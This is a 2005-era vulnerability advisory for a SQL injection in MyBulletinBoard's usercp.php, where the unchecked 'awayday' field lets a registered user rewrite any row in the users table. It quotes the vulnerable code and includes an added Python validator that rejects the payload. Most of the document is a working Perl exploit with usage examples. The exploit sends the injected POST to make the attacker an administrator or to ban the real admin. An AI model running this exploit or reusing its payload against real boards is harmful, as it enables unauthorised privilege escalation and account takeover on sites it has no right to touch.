
SQL-Injection in MyBulletinBoard allows attacker to become a board admin.



Vendor:  www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and maybe prior.
Script:  usercp.php
Code:
if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] != "no")
{
    [...]
    $returndate = $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
    [...]
    $newprofile = array(
        "website"    => addslashes(htmlspecialchars($mybb->input['website'])),
        "icq"        => intval($mybb->input['icq']),
        "aim"        => addslashes(htmlspecialchars($mybb->input['aim'])),
        "yahoo"      => addslashes(htmlspecialchars($mybb->input['yahoo'])),
        "msn"        => addslashes(htmlspecialchars($mybb->input['msn'])),
        "birthday"   => $bday,
        "away"       => $away,
        "awaydate"   => $awaydate,
        "returndate" => $returndate, // <--- not checked (bday too, but anyway)
        "awayreason" => addslashes(htmlspecialchars($mybb->input['awayreason']))
    );
    [...]
    $db->update_query(TABLE_PREFIX."users", $newprofile, "uid='".$mybb->user['uid']."'");
So: an attacker can replace the "awayday" parameter with SQL code and change any field in the _users table. Changing "usergroup" for his "uid" to 4 makes him an admin. To use this bug the attacker has to be a registered or awaiting-activation user.
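The missing server-side check, written as an added example (not MyBB code, and in Python rather than the board's PHP): the three away-date fields are accepted only as plain digits forming a real calendar date, so the value that reaches $returndate can never carry quotes or SQL. It is run against the POST body the PoC below sends (usergroup/uid values constructed) and against a benign submission.

```python
"""Strict validation for the awayday/awaymonth/awayyear fields that usercp.php
concatenates unchecked into $returndate. Added example, not MyBB's own code."""
from urllib.parse import parse_qs
import calendar

# Constructed: the form body the advisory's PoC posts, with the placeholder
# usergroup/uid values filled in. 'awayday' carries the injected SQL.
POC_BODY = ("bday1=&bday2=&bday3=&website=&away=yes&awayreason=Hacking+The+World"
            "&awayday=1-1-2009%27%2C+usergroup=%274%27+WHERE+uid=%27123%27+%2F%2A"
            "&awaymonth=1&awayyear=2009&action=do_profile")

# Constructed: a legitimate submission of the same profile form.
GOOD_BODY = "away=yes&awayreason=holiday&awayday=7&awaymonth=8&awayyear=2006&action=do_profile"


def field(form, name):
    """First value of a form field, or '' when absent (parse_qs returns lists)."""
    return form.get(name, [""])[0]


def build_returndate(body):
    """Return the 'day-month-year' string MyBB stores, or None if any component
    is not a plausible date part. Only ASCII digits are ever copied into the
    result, so quotes, commas and keywords in these fields are rejected whole
    instead of being spliced into the UPDATE statement. This complements, not
    replaces, escaping or parameterising the values in update_query()."""
    form = parse_qs(body, keep_blank_values=True)
    parts = {}
    for name in ("awayday", "awaymonth", "awayyear"):
        raw = field(form, name)
        # isascii() guards against Unicode digits that isdigit() also accepts
        if not (raw.isascii() and raw.isdigit()):
            return None
        parts[name] = int(raw)
    y, m, d = parts["awayyear"], parts["awaymonth"], parts["awayday"]
    if not (1 <= m <= 12 and 1970 <= y <= 2100):
        return None
    if not (1 <= d <= calendar.monthrange(y, m)[1]):
        return None
    return f"{d}-{m}-{y}"


if __name__ == "__main__":
    print("PoC body  ->", build_returndate(POC_BODY))   # None: rejected
    print("Good body ->", build_returndate(GOOD_BODY))  # 7-8-2006
```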

Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

###   MyBB Preview Release 2 SQL-Injection PoC ExPlOiT   ###
###   ------------------------------------------------   ###
###   To use this you have to be registered member on    ###
###   a target.                                          ###
###   ------------------------------------------------   ###
###   Glossary:                                          ###
###     [MYBBUSER] - name of the field in cookie;        ###
###     [YOUR_ID]  - your uid :)                         ###
###     [ID]       - victim uid                          ###
###   Available groups:                                  ###
###     1 - Unregistered / Not Logged In                 ###
###     2 - Registered                                   ###
###     3 - Super Moderators                             ###
###     4 - Administrators                               ###
###     5 - Awayting Activation                          ###
###     6 - Moderators                                   ###
###     7 - Banned                                       ###
###   ------------------------------------------------   ###
###   Examples:                                          ###
###    1) TROUBLE --> U need an admin privileges.        ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [YOUR_ID] -g 4 server /mybb/         ###
###    2) TROUBLE --> U need to ban real admin.          ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [ID] -g 7 server /mybb/              ###

use IO::Socket;

$tmp=0;

while($tmp<@ARGV)
{
 if($ARGV[$tmp] eq "-u")
  {
   $mbuser=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-i")
  {
   $id=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-g")
  {
   $ugr=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-h")
  {
   &f_help();
  }
 $tmp++;
}

$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
 &f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target", PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept: */*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ".length($str)."\n\n$str\n";
while(<$sock>)
{
if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
#   S  u  B  r  O  u  T  i  N  e   #
#----------------------------------#


sub f_help()
{
print q(
 Usage: mybbpr2.pl <OPTIONS> SERVER PATH
 Options:
  -u USERKEY        mybbuser field from cookie.
  -i UID            User's uid. (Change group 4 this user)
  -g GROUP          New usergroup. (1-7)
  -h                Displays this help.
  );
 exit(-1);
}
#'
sub f_die($)
{
 print "\r\nERROR: $_[0]\r\n";
 exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 Sept 2005. Don't remember.
Updated package is available (I hope).

ByE.